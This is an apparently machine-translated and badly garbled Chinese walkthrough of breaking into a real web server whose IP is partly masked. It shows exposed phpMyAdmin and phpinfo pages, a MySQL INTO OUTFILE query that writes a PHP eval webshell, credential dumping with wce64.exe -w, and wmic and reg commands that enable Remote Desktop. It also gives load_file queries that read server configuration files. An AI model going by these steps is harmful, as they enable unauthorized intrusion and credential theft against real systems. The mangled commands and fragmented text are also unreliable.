,西缅,shadonphpMyAdminindexOf
1 .
,,shadon
http://203。* * *。* * .227/
http://203。* * *。* * .227/www。* * * * * * * * .hk.rar
http://203。* * *。* * .227 phpMyAdmin/
http://203。* * *。* * .227/新闻* * * * * * * *元/
,phpinfo.phpphpMyAdminphpinfo。php1
1 2 .
,,2.37 GBconfig。2 notepadroot php
2
3根
3 .
,,phpinfo.phpCtrl + FSCRIPT_FILENAME_SERVER (“SCRIPT_FILENAME”),,,,,D:/WWW/phpinfo。php4
4. 4 mysqlwebshell
,,roothttp://203。* * *。* * .227 phpMyAdmin/5 sqlselect & lt; ?($ _POST[将]);php @ eval调用这些查找?祝辞到输出文件的d:/www/p。php的
5 mysql
6. 6网站管理权限
, http://203。* * *。* * .227http://203。* * *。* * .227/p。phpshell7webshell
7网站管理权限7。
,,,phpwce64。exewce64-w8
8
8.3389,,netstat——|发现“3389”tasklist/svctermservice tasklist/svc |找到“termService PID9ID1340 
9 pid
,netstat -ano134010TCP7755netstat-ano |发现“1340”
10 9 .
,,mstsc.exe3389203。* * *。* *。227:775511
11 10。
,,http://www.yougetsignal.com/tools/web-sites-on-web-server/IP203。* * *。* * .22712IP13
12
131
11。
,13389年phpMyAdminwebshell
netstat-an |找到“3389”,3389
tasklist/svc |找到“TermService TermServicePID
netstat-ano |发现“1340”,2 windows2008server3389 PIDTCP
wmic/命名空间:\ \ \ cimv2 \ terminalservices根路径win32_terminalservicesettingwhere (__CLASS !=" ")调用setallowtsconnections 1
, wmic/命名空间:根\ cimv2 \ \ \ terminalservicespath win32_tsgeneralsetting地方(TerminalName=RDP-Tcp) callsetuserauthenticationrequired 1
, reg添加“HKLM \ SYSTEM \ CurrentControlSet \ \控制终端服务器”/v
3 wce64 - w
4 phpinfoscript_filename 5 phpmyadmin
选择“& lt; ?($ _POST[将]);php @ eval调用这些查找?祝辞到输出文件的d:/www/p。php的
6 phpStudy
selectload_file (' D: \ phpStudy \ Lighttpd \ conf \ vhost。conf”);
选择load_file (' D: \ phpStudy \ Lighttpd \ conf \ Lighttpd。conf”);
selectload_file (“D: \ phpStudy \ Apache \ conf \ vhosts.conf ');
selectload_file (“D: \ phpStudy \ Apache \ conf \ httpd . conf ');
selectload_file (c: \ ini);
selectload_file (c: \ ini);
selectload_file (“MySQL D: \ phpStudy \ \ my.ini”);
,
